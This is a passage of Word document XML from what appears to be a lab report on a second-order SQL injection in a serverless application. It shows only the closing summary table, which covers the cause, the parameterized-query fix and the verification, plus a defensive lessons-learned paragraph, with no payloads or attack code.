              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12742CAC" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DE273A4" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Latency Before/After Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A222B5" w14:paraId="1644B07B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63BCF669" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Second-Order SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6346031E" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The backend trusted previously stored user data and evaluated it as an executable SQL command, breaking data isolation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FF28219" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Intentional misuse / security-relevant abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6575B7A5" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replaced string concatenation with a parameterized query (?) in DVSA-GET-CART-TOTAL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7013287A" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The payload is safely treated as a literal string, returning a clean "Item could not be found" error.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A04D3F9" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64331AED" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 10 — Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CD170" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>In multi-stage serverless workflows, input validation and sanitization must be consistent across all stages, not just at the initial API entry point. Trust boundaries do not end at the database layer; data passed between microservices or retrieved from internal storage must still be treated as potentially malicious. Utilizing parameterized queries is a mandatory defense-in-depth measure for every database interaction.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A222B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8552" w14:textId="77777777" w:rsidR="00D356EB" w:rsidRDefault="00D356EB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19A449F3" w14:textId="77777777" w:rsidR="00D356EB" w:rsidRDefault="00D35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8A20" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="1A3A5C"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="6C7086"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6C7086"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6C7086"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6C7086"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00AD60A2">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="6C7086"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6C70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7D79F" w14:textId="77777777" w:rsidR="00D356EB" w:rsidRDefault="00D356EB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="762CAFDF" w14:textId="77777777" w:rsidR="00D356EB" w:rsidRDefault="00D35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6C77" w14:textId="77777777" w:rsidR="00A222B5" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1A3A5C"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A3A5C"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Second-Order SQL Injection </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A3A5C"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6C7086"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="6C7086"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">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13B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3F6D238"/>
    <w:lvl w:ilvl="0" w:tplc="38601AAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D2DCDF36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="951E494E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8C726CF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="036491C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C3D42ED4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D4D8FC1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AC280C4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6C9059BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7B1E092C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DE681BE"/>
    <w:lvl w:ilvl="0" w:tplc="E49A7BC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AC7242AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E924AF6C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3594D7B6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="01FEA7DA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DF7C1A92">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A900EE54">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="996EA77A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="711814C4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1508903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2B5"/>
    <w:rsid w:val="002755DD"/>
    <w:rsid w:val="00901B50"/>
    <w:rsid w:val="00A222B5"/>
    <w:rsid w:val="00AD60A2"/>
    <w:rsid w:val="00D356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8098"/>
  <w15:docId w15:val="{D6BB7E06-87B9-473D-AA28-7D29A2E4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FAISAL ABDULLAH ALHARBI</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-02T13:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T13:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>